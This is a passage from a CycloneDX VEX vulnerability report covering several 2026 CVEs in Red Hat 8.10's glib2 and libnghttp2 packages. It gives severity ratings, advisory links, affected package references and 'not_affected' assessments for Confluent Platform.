          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-4x46-h598-64qr"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3925"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58013.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58013"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58013"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-19T18:16:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58014",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 8.6,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 8.6,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        193
      ],
      "description": "A flaw was found in GLib. An off-by-one error can occur in the g_key_file_get_locale_string_list function in the gkeyfile.c file when loading a key file with an empty value. This flaw can cause an out-of-bounds access of 1 byte or a denial of service when the out-of-bounds access crosses a page boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58014"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:57015"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58014"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-h88q-m8mm-7243"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3930"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58014.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58014"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58014"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-19T18:16:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58015",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        22
      ],
      "description": "A flaw was found in GLib. The D-Bus client-side implementation of the DBUS_COOKIE_SHA1 SASL authentication mechanism does not validate the cookie_context parameter received from the server. A malicious D-Bus server can supply a cookie_context containing path traversal sequences, causing the client to read an arbitrary file and exfiltrate sensitive data by verifying guessed file contents against a generated hash.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58015"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:49512"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:57015"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58015"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58014"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58015"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55440.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55440"
        },
        {
          "url": "https://github.com/advisories/GHSA-hmpf-72wc-2r6x"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3931"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58015.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55440.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58015"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58015"
        }
      ],
      "published": "2026-06-30T13:19:17+00:00",
      "updated": "2026-08-19T18:16:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-58055",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        444
      ],
      "description": "nghttp2's nghttpx proxy through 1.69.0 forwards an HTTP/1.1 Upgrade request that also carries a Content-Length header and body onto reusable keep-alive backend connections, re-adding the Upgrade and Connection headers while passing Content-Length verbatim. A backend that resolves the resulting ambiguous message in the attacker's favor enables HTTP request/response smuggling and cross-client response-queue poisoning.",
      "recommendation": "Upgrade libnghttp2 to version 1.33.0-6.el8_10.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-58055"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54650"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54662"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-58055"
        },
        {
          "url": "https://bugzilla.redhat.com/2493954"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2493954"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58055"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-54650.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:54662"
        },
        {
          "url": "https://github.com/advisories/GHSA-xrr7-82jr-v58x"
        },
        {
          "url": "https://github.com/bikini/exploitarium/tree/main/nghttp2-nghttpx-upgrade-queue-poison-poc"
        },
        {
          "url": "https://github.com/nghttp2/nghttp2/commit/ab28105c4a0197da24f8bfc414bc116055249e1e"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-58055.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55804.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58055"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8495-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-58055"
        },
        {
          "url": "https://www.vulncheck.com/advisories/nghttp2-nghttpx-http-request-response-smuggling-via-upgrade-request-with-content-length"
        }
      ],
      "published": "2026-06-28T02:16:32+00:00",
      "updated": "2026-06-30T17:41:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.33.0-6.el8_10.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libnghttp2@1.33.0-6.el8_10.2?arch=x86_64&distro=redhat-8.10"
        },
        {
